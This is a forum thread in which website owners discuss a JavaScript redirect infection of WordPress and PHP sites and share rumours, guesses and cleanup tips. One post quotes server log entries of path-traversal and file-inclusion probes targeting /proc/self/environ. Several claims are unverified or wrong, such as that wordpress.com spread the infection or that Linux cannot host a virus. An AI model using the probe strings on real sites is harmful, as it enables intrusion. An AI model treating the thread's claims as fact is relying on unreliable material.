![]() |
| ||||||||
|
|||||||
![]() |
|
|
LinkBack | Thread Tools |
|
|
#1 |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
APPARENTLY WORDPRESS IS NOT THE CULPRIT - COINCIDENCE THAT THE SITE WAS HIT WHILE I WAS BROWSING WORD PRESS - MORE INFO ON POST 107 - THIRD PAGE.
I was just in admin on my new blog - was browsing the themes and all of the sudden my avast went nuts. I cut the connection but it was too late - my blog has JS redirect virus now -- new so I'm just going to toss it and hope that it can't spread on that server. It is on the WP website itself so EVERYONE with WP might be vulnerable now. Best thing you can do is shut down your php until they fix their virus problem because it will invade your whole site - everything but HTML. This is NOT a joke. I have contacted WP in a bug report and reported the virus on twitter hoping their admin will see it quickly - if anyone has an inside track to WP admin - they need to be notified IMMEDIATELY. |
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
|
|
|
|
| The Following 9 Users Say Thank You to HeySal For This Useful Post: |
|
|
#2 |
|
Active Warrior
Join Date: Feb 2009
Posts: 35
Thanks: 0
Thanked 1 Time in 1 Post
|
Yeah, because it's really possible to shut down your "php"...
|
|
|
|
|
|
#3 |
|
Master of The Universe
War Room Member
Join Date: Apr 2006
Location: Australia.
Posts: 2,490
Blog Entries: 4
Thanks: 281
Thanked 125 Times in 66 Posts
|
Wow...
Thanks for the heads-up Sal! So you were actually inside your wordpress.com admin when that all happened? Take Care, Michael Silvester |
|
|
|
|
|
|
|
|
#4 |
|
Active Warrior
War Room Member
Join Date: Apr 2009
Location: Australia
Posts: 31
Thanks: 3
Thanked 3 Times in 3 Posts
|
|
|
Need a break? Watch free tv online
|
|
|
|
|
|
|
#5 |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
Look I'm not a tech but I do know that this can wipe out your php because My main site was hit a few months back - and my tech is world class security - ask Kevin Riley and Peter Bestel if I'm kidding. You might not be able to turn off your php, but everything on it can get pretty badly messed up from these things. This isn't a normal virus. It's taking down sites left and right.
|
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
|
|
|
|
|
|
#7 |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
I not only lost everything php, I can't use mysql at all -we are rebuilding everything possible in HTML - it doesn't seem to effect HTML. I hadn't even started working on this one yet - the address my avast brought up with the alarm was the wordrpress install - I hadn't even hit install, page 6 of the themes menu was just loading. As soon as the alarm went off I cut that page and went back to my admin but I already wasn't able to get back on admin - avast blocked it.
On my other site we lost our forum, cube cart, coppermine photo gallery, and blog. There were so many security holes chewed that the virus was coming back in as fast as my tech could plug the holes. Every page in php was effected. Peter Bestel is having problems not being able to keep it off and Kevin just had someone fix his site, not sure if he was able to totally get rid of it but if it is on the Wordpress site itself, nobody is safe and nobody will be able to keep it off. They are on their way to crashing out php on a lot of servers. |
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
|
|
|
|
|
|
#8 |
|
don't label me.
War Room Member
Join Date: Jul 2006
Location: Mount Vernon, IL
Posts: 3,643
Blog Entries: 1
Thanks: 162
Thanked 141 Times in 90 Posts
|
Sal,
You might want to consider getting a new host that will keep your server secure and a new tech guy because it sounds like he isnt as great as you may think. |
|
She did what?
|
|
|
|
|
|
|
#9 | |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
Quote:
Anyhow -- this isn't MY site I'm talking about now - - this is on WORPRESS's site. That means every script hooked to it is in danger - and if you want to mess with it, fine, but you might want to talk to Kevin and find out the problems that his tech went through with it if you don't think mine was capable. Or find out if Peter was able to FINALLY get them off or if he is having to rebuild (which won't do much good since it's on worpress itself now). Like I said - this is not a JOKE - not by a hell of a longshot. No one who is dealt with this one so far is going to take this lightly. | |
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
||
|
|
|
|
|
#10 | |
|
Veteran Marketing Warrior
War Room Member
Join Date: Jun 2009
Posts: 612
Thanks: 21
Thanked 78 Times in 62 Posts
|
Quote:
After much digging I discovered that the sites had actually been hacked over FTP. Looks to me as if the users have caught a "drive by" trojan which is either a key logger or sends login details to the hacker. I do not know he origin, but I do know it is spreading fast around the 'net. I always suggest people run an anti-trojan program every day. The best in my view is: A-Squared Not aff link. | |
|
|
|
| The Following User Says Thank You to Adrian Cooper For This Useful Post: |
|
|
#11 |
|
You R GREAT if you are A
War Room Member
Join Date: Jul 2002
Location: Shakey/Sunny CA, USA.
Posts: 5,372
Blog Entries: 31
Thanks: 1,496
Thanked 752 Times in 269 Posts
|
HeySal,
Forgive my ignorance. When you say Wordpress are you talking about the blogs that are actually hosted by WP or the WP blogs we have installed on our own hosts. Thanks, George Wright |
|
Today Could Be Your Last Chance to get 1,000,000 Templates for $7.77 Price Goes Up Soon!
LOOK! Amazing NEW and EASY way to write, edit and CREATE your next eBook NEW FAST eBook Creation Method $7.77 "One Million eBook Templates" Ton's of goodies to go with this WSO YOU will LOVE this. LIVE interactive Table of contents creation so easy Even I Can Do It. |
|
|
|
|
|
|
#12 |
|
The Lord is My Sheppard
Join Date: Jun 2009
Location: Clarksville, TN
Posts: 8
Thanks: 0
Thanked 0 Times in 0 Posts
|
If you downloaded anything from any warez sites a person would be just asking for a hijack. another thing. avoid windows servers. linux can't physically host a virus. it's total impossible. The only thing a iframe virus is such: a iframe that opens a location on another website ( server ) and hosts the virus or maluware etc.etc.etc.
The best way to avoid this: 1.) only go to sites that you are familiar with 2.) use upper n lower case letters with symbols in your passwords to your websites. 3.) if you have to go to a website, go to yahoo google msn and see what is pulled up about the site. even siteadvisor.com/sites/thewebsitename.com/summary/ 4.) before installing any program do your homework on it to ensure that your not installing a program that has a known exploit. Anyhow I hope I was in some assistance |
|
|
|
|
|
|
|
|
#13 | |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
Quote:
At the end of last year Government computers were hacked. My techs computer was hacked -- at the bios level! A few months later the JS redirect viruses started cropping up -- a lot of people that have it don't even have a clue. Avast will tell on it, but won't take it off, even though it looks like it is doing or has done so. It has to be removed manually. On my site and many others WP was hosted on my server - I don't use fly by night servers, but still will be going to servage after this - just dumping everything that worked on php. We had them get on our site manually - Fin had it hooked up so bots couldn't get on it - it was a live member. Got in and ran something on it manually from what he could tell. Built security holes all over so they could get back in then set a bot in there and loaded fake JS codes on EVERY PAGE that wasn't pure HTML. It was a mess. Enough so that I'm just dumping the whole load of php programs. After 3 years of continual build and a thosand or two pages, it's just easier. ECS_Dave just set this WP up for a JV we are getting ready to build. So the blog is on his server - not sure which one - doesn't matter, the virus came straight from the wordpress site. I was browsing for a theme and page 6 of the theme menu was loading and that is when my avast went off. I disconnected from the page immediately but it wasn't fast enough because I can't access my admin page now - my Avast won't let me. It was that fast. Avast gave the address of the virus as http://wordpress...../install/ but I had not even tried to install one of the themes yet. That's all I can tell you. It is on wordpress. | |
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
||
|
|
|
| The Following User Says Thank You to HeySal For This Useful Post: |
|
|
#14 |
|
there is no spoon
War Room Member
Join Date: Jan 2008
Location: Wigtown, Newton Stewart, Scotland.
Posts: 1,095
Blog Entries: 3
Thanks: 115
Thanked 248 Times in 96 Posts
|
Can't join in the conversation much as I'm just out the door, but Sal is right, nasty little buggers. I can't confirm that the Wordpress site is infected (don't fancy going there just to check) but if it's on your server then your blogs and websites become unusable, flagged as trojan sites and redirect to numerous 'suspicious' sites.
My sites are looking OK just now but I've had to spend a lot of time on this issue and I've become a tad paranoid because of it. Peter |
|
Don't click here. No, please, you're far too stressed, you'll only feel better
www.TwitterPeter.com <- That'll be me on Twitter then! |
|
|
|
|
|
|
#15 |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
yeah - avast gave a wordpress.com address for it -- but I was in such a damned big hurry disconnecting before it got my admin that I didn't get the whole thing - got my admin anyway. I am scanning my own computer right now just for gp's and will check my log and see if the compete address is listed even though I disconnected like a mad hatter to get away from it. I know it was on page 6 of the theme menu if you search it without perimeters - but all that means is that before the night is over it will probably be on all of the themes and into the widgets as well. It travels damned fast once it gets in. With so few anti-virus programs able to detect it half the web is going to be infested if they don't shut it down right away.
|
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
|
|
|
|
|
|
#16 |
|
Active Warrior
Join Date: Jul 2007
Location: , , .
Posts: 74
Thanks: 0
Thanked 7 Times in 6 Posts
|
So if your site is infected it looks all scrambled up or how can you tell if it's been infected?
|
|
|
|
|
|
#17 |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
You won't see it. The only way you will know it is there is if you have Avast - it will alert you that there is a virus. If you are good at Java script codes you will see slight differences from real codes - it loves yahoo counters. If you have one and know the Java script you have almost an automatic signal right there. Not sure how the site will act to others because my avast blocks access to an infected sites. Most anti-virus programs won't detect it. If it's on your computer Avast will make you believe it took it off, but it doesn't - you have to do it manually - if you go to my profile, go all the way back to the beginning of my thanked posts and the discription of the one you get on your computer itself will be described there. There is a similar audio address, too.
On your website, it just creates complete havoc as it sinks in (it's a worm that eventually plants a root kit so nothing is safe if you don't get it off. It will redirect visitors to other sites as well. Not good ones either. Great for your future traffic, eh? Thanks Russia - I used to be proud of my Cossack roots. |
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
|
|
|
|
|
|
#18 |
|
Freeman Creations
War Room Member
Join Date: Nov 2006
Location: Somewhere next to a desert cactus, USA.
Posts: 980
Blog Entries: 4
Thanks: 166
Thanked 41 Times in 25 Posts
|
Thanks Sal. Considering starting a wordpress blog tonight and came across the thread. I see a few mentions of the JS virus at McAfee's site:
JS/Downloader-BNL Is this the same one you're talking about? If it is, "This trojan can get installed while browsing Websites where it has been hosted." Sounds like it might be a good idea to wait on installing any WordPress themes if anyone else is thinking about it. Grant |
|
|
|
|
|
|
|
|
#19 |
|
Zen Redneck
War Room Member
Join Date: Jul 2002
Location: Erie, PA
Posts: 8,025
Blog Entries: 1
Thanks: 284
Thanked 1,928 Times in 548 Posts
|
Possibly the problem?
PHP Script Injection Exploit in WordPress 2.7.1 | TechJaws: Internet Security and SEO |
|
|
|
|
|
|
|
|
#20 |
|
Christmas Rocker
Join Date: Aug 2006
Location: North Pole
Posts: 1,891
Blog Entries: 1
Thanks: 370
Thanked 375 Times in 192 Posts
|
I experienced something similar with Kaspersky this week. It flagged ad.doubleclick.net redirects on bbc.co.uk and apple.com as phishing sites.
I phoned doubleclick about it and seems to have cleared up. Martin |
|
Get A Bumper Christmas PLR Pack with 8 Top Quality Articles, 6 Quizzes, WP Theme and Bonuses
PLUS: 12 Tweet2Blog Posts - A New Twitter/Blogging Service. Only 100 licences available. http://extravirginplr.com/christmas-plr-pack |
|
|
|
|
|
|
#21 |
|
French Warrior
War Room Member
Join Date: Feb 2009
Location: Marseille, France
Posts: 102
Thanks: 4
Thanked 4 Times in 3 Posts
|
Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?
Cheers, Samuel. |
|
My Forex Review Blog : www.UltimateForexReview.com
|
|
|
|
|
|
|
#22 | |
|
Advanced Warrior
Join Date: Feb 2007
Posts: 520
Thanks: 23
Thanked 22 Times in 8 Posts
|
Quote:
| |
|
|
||
|
|
|
|
|
#23 | |
|
HyperActive Warrior
Join Date: Oct 2008
Location: West Sussex, UK
Posts: 309
Thanks: 83
Thanked 43 Times in 33 Posts
|
Quote:
However, the operating system that your server uses (Windows, Linux, MacOS) could be a factor in how susceptible it is to certain attacks. | |
|
|
|
|
|
#24 |
|
Freeman Creations
War Room Member
Join Date: Nov 2006
Location: Somewhere next to a desert cactus, USA.
Posts: 980
Blog Entries: 4
Thanks: 166
Thanked 41 Times in 25 Posts
|
It's not a dumb question
According to this it's possible:Are Windows PCs Threatened by Malware Harbored on Mac & Linux OS’s? - Security Corner The way I understand this, is if I downloaded a wordpress theme on my mac, and: • uploaded it to my server space- It could effect people with PC's that visit my site • sent it to a friend with a PC - It could effect my friends computer Edit: or is this just an attack on web hosting machines only? Trying to understand this. Grant |
|
|
|
|
|
|
|
|
#25 | |
|
Veteran Marketing Warrior
War Room Member
Join Date: Jun 2009
Posts: 612
Thanks: 21
Thanked 78 Times in 62 Posts
|
Quote:
A Mac is much safer from that perspective. | |
|
|
|
|
|
#26 | |
|
Veteran Marketing Warrior
War Room Member
Join Date: Jun 2009
Posts: 612
Thanks: 21
Thanked 78 Times in 62 Posts
|
Quote:
Hackers are collecting logins via trojans and hacking sites over FTP - I am sorting out this issue for people hosted on one of my servers. Trojans are nasty and insidious, which is why everyone should regularly scan for them using A Squared or whatever. | |
|
|
|
|
|
#27 | |
|
HyperActive Warrior
Join Date: Oct 2008
Location: West Sussex, UK
Posts: 309
Thanks: 83
Thanked 43 Times in 33 Posts
|
Quote:
| |
|
|
|
| The Following User Says Thank You to John Henderson For This Useful Post: |
|
|
#28 |
|
Senior Warrior Member
War Room Member
Join Date: Jun 2007
Location: ,Sydney , Australia.
Posts: 1,432
Thanks: 56
Thanked 27 Times in 20 Posts
|
Does this mean we can't visit any WP blogs out there that are specifically hosted at WP?
Or can we visit other blogs that use WP elsewhere? |
|
|
|
|
|
|
|
|
#29 | |
|
Advanced Warrior
War Room Member
Join Date: Sep 2007
Location: hong kong
Posts: 532
Thanks: 0
Thanked 12 Times in 12 Posts
|
Quote:
Well Samuel. it is a php exploit or javacript level. It is nothing to do if you are using windows MAC or Linux.. It accepts the web browsers, Perhaps IE I think... any issue using Firefox? anyone knows? | |
|
*Free Premium Wordpress Themes* With Salesletter - Limited Time Only Download Them Now!
adsense templates | Wordpress Adsense Themes | business blogging | Make Money Online | christmas gifts 2009 |
||
|
|
|
|
|
#30 |
|
Portuguese Warrior
War Room Member
Join Date: Nov 2008
Location: Good Old Europe
Posts: 1,095
Blog Entries: 1
Thanks: 348
Thanked 131 Times in 93 Posts
|
Thanks for the heads-up Sal.
Damn, Lots of trouble ahead this weekend. Is Hostgator usually secure from this issues? |
|
Discover MiniSiteBox -- Yes, You get Professional Minisites... but you don't have to spend what others charge you for a "I've seen it before!!" sales page.
We just do our stuff from scratch. You just sit and cash in. |
|
|
|
|
|
|
#31 |
|
HyperActive Warrior
Join Date: Oct 2008
Location: West Sussex, UK
Posts: 309
Thanks: 83
Thanked 43 Times in 33 Posts
|
While I was getting something to eat today, I was watching "Working Lunch" on BBC2 (it's a show dedicated to money and business matters, and it's on at lunchtime).
The hosts of the show said "The gremlins have got into our website, so we can't direct you to that at the moment...". I immediately thought of this thread... ![]() http://news.bbc.co.uk/1/programmes/w...ch/default.stm |
|
|
|
|
|
#32 | |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
Quote:
This virus started around about the time the US Gov computers got hacked. That might be a coincidence, but it also might just be some sort of show of power, too. Both Russian sources. So are they going to cyber war on the world or what? IF you think that email phishers were sick bastards - this thing makes them look like boy scouts. I'm wondering how long it's going to be before they start stamping this crud with an "over 100 million served" sign. | |
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
||
|
|
|
|
|
#33 |
|
French Warrior
War Room Member
Join Date: Feb 2009
Location: Marseille, France
Posts: 102
Thanks: 4
Thanked 4 Times in 3 Posts
|
Thanks everybody for having answered... That seems to be such a nasty virus. But why do those jerks need to set up such virus ?!?!! What's the interest ??
|
|
My Forex Review Blog : www.UltimateForexReview.com
|
|
|
|
|
|
|
#34 |
|
AT gmail DOT com
War Room Member
Join Date: May 2009
Location: Kent, WA
Posts: 1,283
Thanks: 427
Thanked 574 Times in 327 Posts
|
Why exactly is this story not on Slashdot - or any other news outlet I can find - after nine hours? Is this not really a WP site issue?
|
|
I'm that writer you ask how to find every time your other writers deliver. SEO That Works - In The Long Run - Coming Soon... An employee is bought for what he thinks he is worth, and sold for what he is truly worth; from this alone, his employer profits.
|
|
|
|
|
|
|
#35 |
|
Advanced Warrior
War Room Member
Join Date: Jan 2006
Location: North Carolina
Posts: 856
Thanks: 67
Thanked 30 Times in 24 Posts
|
I'm still confused, as this question hasn't been directly answered - I'm seeing references to both.
Does this affect only blogs hosted at WordPress.com ? Or - does it also affect blogs that we install on our own websites? Or - does it only concern WordPress themes (not themes from 3rd parties), which means it doesn't matter if your blog is installed on your own site or is hosted by WordPress.com ? |
|
|
|
|
|
|
|
|
#36 |
|
The Marketing Wookie
War Room Member
Join Date: Feb 2009
Location: Cincinnati, OH area
Posts: 877
Blog Entries: 3
Thanks: 86
Thanked 312 Times in 162 Posts
|
Hey HeySal... PHP is teh suxx0r... in fact, any interpreted script is more vulnerable... check out DotNetNuke - The Leading Open Source Web Content Management Framework for ASP.NET
|
|
Read more of my crap at my Innovation. Strategy, and Success blog... http://www.michaelhiles.com
|
|
|
|
|
|
|
#37 | |
|
Advanced Warrior
War Room Member
Join Date: May 2008
Location: Swansea, South Wales, UK
Posts: 798
Thanks: 391
Thanked 137 Times in 93 Posts
|
Quote:
![]() Sue | |
|
SALE---> Wordpress Christmas Theme Package Sale, 5 Themes for just $7 <---SALE
Featured Content Gallery Integration, 5 Designs to choose from! One-to-One Wordpress Coaching Service Available at Low Hourly Rate - Let the frustration end now! Wordpress Installs, Theme Design, Site Tweaks & other services available - 20% discount for Warriors! |
||
|
|
|
|
|
#38 |
|
there is no spoon
War Room Member
Join Date: Jan 2008
Location: Wigtown, Newton Stewart, Scotland.
Posts: 1,095
Blog Entries: 3
Thanks: 115
Thanked 248 Times in 96 Posts
|
This is my experience for those that need some clarification.
I've got a number of wordpress blogs hosted on Dreamhost (shared hosting). I use a mix of freebie themes and a few on the paid theme, Thesis. About three weeks ago my PC got a bunch of trojans, viruses etc all at once. At the same time my Dreamhost account was attacked with this Javascript iframe redirect, affecting ALL my wordpress blogs and a few static websites that I've got on that server. It installs extra code into php files, normally index.php, admin.php, a few theme php files including both the free ones and Thesis and also onto some plugin files. Installing Wordpress plugin 'Exploit Scanner' identified the baddies and I was able to clean up all the sites, only for it to return a few days later. I purchased Craig Desorcy's Block Lock Down e-book, followed his instructions and since have been clean. Can't recommend that one highly enough. Cleaning the PC has taken an eternity but I reckon I'm as clean as I can be for now. I can't comment on the issue with the actual Wordpress site site being infected as I've not experienced it, but it's not impossible, for sure. I reckon the initial infection on my PC keylogged my FTP and got to my server that way. I've got Roboform but for some reason wasn't using it for Filezilla (which I've sinced dumped). I now use Secure FTP together with Roboform. Touch wood, everything appears clean, but I've said that before... Check out the link that Paul Myers posted earlier in this thread, pretty much explains the minimum that needs to be done. Peter PS No doubt better quality hosting may have saved some hassle - hindsight's such a wonderfully accurate science. |
|
Don't click here. No, please, you're far too stressed, you'll only feel better
www.TwitterPeter.com <- That'll be me on Twitter then! |
|
|
|
|
|
|
#39 |
|
Breakthrough Expert
War Room Member
Join Date: Aug 2002
Location: Kansas City Metro, MO , USA.
Posts: 998
Thanks: 117
Thanked 119 Times in 81 Posts
|
A Short answer to the can the mac be infected.
YES, and thousands are, because so there are so few people even bothering using AV software on macs there are tons of them infected. Remember, Mac Operating system is isn't really an independent system its an interface written on top of the BSD version of unix. Sal in the opening post is talking about the Wordpress.COM hosted site. NOT self hosted word press. Mark Riddle |
|
What if you didn't need money?
How would your life be changed? |
|
|
|
|
|
|
#40 |
|
Is a...
War Room Member
Join Date: Sep 2007
Location: In the USA...
Posts: 749
Blog Entries: 5
Thanks: 35
Thanked 14 Times in 13 Posts
|
I'm not certain how this code is getting into the php files...
I looked at a couple and they had some encoded javascript code at the end of each of them. I didn't (shame on me) note which files, but as this was a "new" installation, went ahead and uninstalled using the fantastico utility. I then installed a new instance of the latest wordpress (2.8), and have not seen any issues, thus far. Of course, the password was changed... ![]() By no means am I a web-security expert, nor do I portray one in any shape or fashion, anywhere... However, I have learned the very first line of defense should be one's own machine. This includes, but is not limited to a current, updated, and reputable virus scanner -- A "malware" scanner -- and perhaps some diligence with regards to the sites you visit. Be Well! ECS Dave |
|
See my Latest Squidoo - #1 on Google!?!? | Personal Development Audios Sample Video!
Extra Cash Systems Weblog | Instant Traffic Generators FREE Wordpress Guide! http://bit.ly/OMUOU Did I say FREE? ;=) | RAPID ACTION PROFITS Delivers! |
|
|
|
|
|
|
#41 | |
|
Is a...
War Room Member
Join Date: Sep 2007
Location: In the USA...
Posts: 749
Blog Entries: 5
Thanks: 35
Thanked 14 Times in 13 Posts
|
Quote:
She was using the "Add New Themes" interface, built into the WP dashboard, which links to the wp-themes.com site. Being the brave soul that I am, I browsed the pages myself, but (thankfully) was unable to recreate the error/problem/issue. Be Well! ECS Dave | |
|
See my Latest Squidoo - #1 on Google!?!? | Personal Development Audios Sample Video!
Extra Cash Systems Weblog | Instant Traffic Generators FREE Wordpress Guide! http://bit.ly/OMUOU Did I say FREE? ;=) | RAPID ACTION PROFITS Delivers! |
||
|
|
|
|
|
#42 |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
That's right Mark - this time I am talking about the wordpress site itself. I was browsing the themes available when I was hit.
On my other site - the WP was on my site's server - but it was actually the phpbb forum that they came in through. Once more - if you have php scripts running, you are vulnerable. Anything with 777 permissions is vulnerable. I don't think it matters what system you are on and I think that some hosts are safer than others but not sure that any are completely safe. I'm not sure at this point if anything will ever be completely safe again. I think I'm seeing that AVG is also able to detect the virus. Still probably have to remove it by hand, it really knows how to protect itself. Whoever said their static scripts got hit too - that is just too scary to think about. |
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
|
|
|
|
|
|
#43 | |
|
Active Warrior
Join Date: Jan 2009
Location: Bend, OR
Posts: 95
Thanks: 6
Thanked 9 Times in 8 Posts
|
Mark, can you provide some independent links to verify your statements concerning the Mac OS?
Leon McKee Quote:
| |
|
|
|
|
|
#44 | |
|
Breakthrough Expert
War Room Member
Join Date: Aug 2002
Location: Kansas City Metro, MO , USA.
Posts: 998
Thanks: 117
Thanked 119 Times in 81 Posts
|
Quote:
FreeBSD - Wikipedia, the free encyclopedia Apple - Mac OS X Leopard - Technology - UNIX | |
|
What if you didn't need money?
How would your life be changed? |
||
|
|
|
|
|
#45 |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
Dave - you did recreate it - or just didn't get rid of it. The main domain URL still sets off my avast. I'm not going any further on it as I don't want to have to get this thing off of my own computer, too.
Your FTP is probably compromised. Dump the site - it's not been worked on so not much loss and much easier clean up. Your whole hosting account is probably infested. |
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
|
|
|
|
|
|
#46 |
|
Active Warrior
War Room Member
Join Date: Jul 2007
Location: Atlanta, GA, USA.
Posts: 94
Thanks: 12
Thanked 4 Times in 4 Posts
|
Would anyone be able to advise me about this situation, please? After reading this thread, I went to check some things on a new WP self-hosted blog I just installed a couple of weeks ago. It's using version 2.8 and hosted on Hostgator.
I checked my latest visitors stats and saw something I'm concerned about. It shows: Host: 83.148.64.25 * /featured/how-t%20.../arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../. Http Code: 404 Date: Jun 12 09:12:17 Http Version: HTTP/1.1 * /featured/arcade.php?phpbb_root_path=http://forgottentreasures.net/../proc/self/environ%00 Http Code: 403 Date: Jun 12 09:28:16 Http Version: HTTP/1.1 Since this shows 403/404 codes does it mean everything is ok? I am so new to WP blogs and this really has me worried. Thanks so much for any help you can offer. Angela |
|
|
|
|
|
#47 | |
|
Active Warrior
Join Date: Jan 2009
Location: Bend, OR
Posts: 95
Thanks: 6
Thanked 9 Times in 8 Posts
|
Mark, what I'm asking for are specific links that show the Mac OS is or has been infected. A lot of marketers do have Macs sitting on their desktops so it's a good idea to stay abreast of these types of issues to say the least.
Leon McKee Quote:
| |
|
|
|
|
|
#48 |
|
Is a...
War Room Member
Join Date: Sep 2007
Location: In the USA...
Posts: 749
Blog Entries: 5
Thanks: 35
Thanked 14 Times in 13 Posts
|
I copied the code from one of the pages, and uploaded it to virustotal.com and got this result:
Virustotal. MD5: e47fd7ca9ad1adf9b0f8bba33e19fc5f JS:Bulered JS:Bulered And google's results for "JS:Bulered" are limited, to say the least.. I tried several online JS decoders, but no go there either... Hmmm... Be Well! ECS Dave |
|
See my Latest Squidoo - #1 on Google!?!? | Personal Development Audios Sample Video!
Extra Cash Systems Weblog | Instant Traffic Generators FREE Wordpress Guide! http://bit.ly/OMUOU Did I say FREE? ;=) | RAPID ACTION PROFITS Delivers! |
|
|
|
|
|
|
#49 |
|
Politically Incorrect
Join Date: Nov 2004
Location: , , USA.
Posts: 3,053
Thanks: 250
Thanked 413 Times in 314 Posts
|
What is your URL? My avast goes off when I land on an infected site - easiest way to tell.
|
|
Get A LIFE - AT RHS1.com
In Memory of MUNCHIE Dog gone Awesome pet niche PLR --->>>WSO<-->> Quality WF ONLY -UNIQUE CONTENT w/all rights - WSO |
|
|
|
|
|
|
#50 | |
|
Active Warrior
War Room Member
Join Date: Jul 2007
Location: Atlanta, GA, USA.
Posts: 94
Thanks: 12
Thanked 4 Times in 4 Posts
|
Quote:
It's Stress Free Wedding Planning Thanks so very much!!! I'm in a bit of a panic here. ![]() Angela | |
|
|
|
![]() |
|
| Tags |
| redirect, virus, warning, wordpresscom |
| Thread Tools | |
|
|
![]() |